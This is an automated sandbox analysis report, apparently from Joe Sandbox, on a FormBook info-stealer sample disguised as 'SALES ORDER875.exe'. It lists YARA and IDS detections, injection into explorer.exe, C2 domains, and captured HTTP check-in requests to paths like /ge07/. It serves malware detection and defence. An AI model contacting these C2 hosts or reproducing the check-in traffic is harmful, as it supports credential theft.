Windows Analysis Report
SALES ORDER875.exe

AI detected suspicious sample

Source: Yara match	File source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: SALES ORDER875.exe

Joe Sandbox ML: detected

Source: SALES ORDER875.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: netsh.pdb source: svchost.exe, 00000001.00000002.1898626639.0000000003180000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1897815254.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1897949965.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1897815254.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000004.00000002.4126745037.0000000001560000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: SALES ORDER875.exe, 00000000.00000003.1828189983.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, SALES ORDER875.exe, 00000000.00000003.1823570510.0000000004360000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1828434311.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898690077.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1829990258.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898690077.0000000003200000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1898449365.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4125785464.0000000000F6E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1900238862.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4125785464.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: netsh.pdbGCTL source: svchost.exe, 00000001.00000002.1898626639.0000000003180000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1897815254.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1897949965.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1897815254.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4126745037.0000000001560000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: SALES ORDER875.exe, 00000000.00000003.1828189983.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, SALES ORDER875.exe, 00000000.00000003.1823570510.0000000004360000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1828434311.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898690077.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1829990258.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898690077.0000000003200000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000004.00000003.1898449365.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4125785464.0000000000F6E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1900238862.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4125785464.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.4141739239.0000000010D2F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000004.00000002.4125249385.0000000000695000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4126879168.000000000377F000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.4141739239.0000000010D2F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000004.00000002.4125249385.0000000000695000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4126879168.000000000377F000.00000004.10000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003F68EE FindFirstFileW,FindClose,	0_2_003F68EE
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_003F698F
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_003ED076
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_003ED3A9
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_003F9642
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_003F979D
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_003F9B2B
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_003EDBBE
Source: C:\Users\user\Desktop\SALES ORDER875.exe	Code function: 0_2_003F5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_003F5C97

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50002 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50002 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50002 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50003 -> 216.239.32.52:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50003 -> 216.239.32.52:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50003 -> 216.239.32.52:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 199.59.243.227 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 216.239.32.52 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.9net88.net/ge07/

Performs DNS queries to domains with low reputation

Source:	DNS query: www.ool-covers76.xyz
Source:	DNS query: www.zoc-marriage.xyz
Source:	DNS query: www.ivglass.xyz

Source: global traffic	HTTP traffic detected: GET /ge07/?AZFdK=5jGt1VUhS4spDnR&bb=rInKjcPO3O96ojanc4NFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22tP8faITl6ID HTTP/1.1Host: www.9net88.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ge07/?bb=jzpSmAmxAHuMrBYVYK/iobfyuTkKVe1DkRFizLdS8mEnIcKQ83L44yYAyf2Gtg0WJqSR&AZFdK=5jGt1VUhS4spDnR HTTP/1.1Host: www.yegle.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 199.59.243.227 199.59.243.227

Source: Joe Sandbox View

ASN Name: BODIS-NJUS BODIS-NJUS

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49736
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49730

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003FCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_003FCE44

Source: global traffic	HTTP traffic detected: GET /ge07/?AZFdK=5jGt1VUhS4spDnR&bb=rInKjcPO3O96ojanc4NFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22tP8faITl6ID HTTP/1.1Host: www.9net88.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ge07/?bb=jzpSmAmxAHuMrBYVYK/iobfyuTkKVe1DkRFizLdS8mEnIcKQ83L44yYAyf2Gtg0WJqSR&AZFdK=5jGt1VUhS4spDnR HTTP/1.1Host: www.yegle.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.lasterdeals.shop
Source: global traffic	DNS traffic detected: DNS query: www.rkgexg.top
Source: global traffic	DNS traffic detected: DNS query: www.ocockbowerlybrawer.cfd
Source: global traffic	DNS traffic detected: DNS query: www.ool-covers76.xyz
Source: global traffic	DNS traffic detected: DNS query: www.9net88.net
Source: global traffic	DNS traffic detected: DNS query: www.yegle.net
Source: global traffic	DNS traffic detected: DNS query: www.iscinddocenaemlynne.cfd
Source: global traffic	DNS traffic detected: DNS query: www.zoc-marriage.xyz
Source: global traffic	DNS traffic detected: DNS query: www.ivglass.xyz
Source: global traffic	DNS traffic detected: DNS query: www.pm-22-ns-2.click

Source: explorer.exe, 00000003.00000000.1841567797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4135604265.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000003.00000000.1841567797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4135604265.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000003.00000000.1841567797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4135604265.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000003.00000000.1841567797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4135604265.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000003.00000000.1841567797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000003.00000002.4134940464.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4134269586.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1845690815.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.9net88.net
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.9net88.net/ge07/
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.9net88.net/ge07/www.yegle.net
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.9net88.netReferer:
Source: explorer.exe, 00000003.00000003.3105701317.000000000C9BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114249246.000000000C9EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1848448919.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cillascrewedsedroth.cfd
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cillascrewedsedroth.cfd/ge07/
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cillascrewedsedroth.cfd/ge07/www.ithin-ksvodn.xyz
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cillascrewedsedroth.cfdReferer:
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ecurityemployment.today
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ecurityemployment.today/ge07/
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ecurityemployment.today/ge07/www.f7y2i9fgm.xyz
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ecurityemployment.todayReferer:
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.f7y2i9fgm.xyz
Source: explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.f7y2i9fgm.xyz/ge07/
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.f7y2i9fgm.xyzReferer:
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.giyztm.xyz
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.giyztm.xyz/ge07/
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.giyztm.xyz/ge07/www.iscinddocenaemlynne.cfd
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.giyztm.xyzReferer:
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.iscinddocenaemlynne.cfd
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.iscinddocenaemlynne.cfd/ge07/
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.iscinddocenaemlynne.cfd/ge07/www.zoc-marriage.xyz
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.iscinddocenaemlynne.cfdReferer:
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ithin-ksvodn.xyz
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ithin-ksvodn.xyz/ge07/
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ithin-ksvodn.xyz/ge07/www.pipagtxcorrelo.xyz
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ithin-ksvodn.xyzReferer:
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ivglass.xyz
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ivglass.xyz/ge07/
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ivglass.xyz/ge07/www.pm-22-ns-2.click
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ivglass.xyzReferer:
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lasterdeals.shop
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lasterdeals.shop/ge07/
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lasterdeals.shop/ge07/www.rkgexg.top
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lasterdeals.shopReferer:
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ocockbowerlybrawer.cfd
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ocockbowerlybrawer.cfd/ge07/
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ocockbowerlybrawer.cfd/ge07/www.ool-covers76.xyz
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ocockbowerlybrawer.cfdReferer:
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ool-covers76.xyz
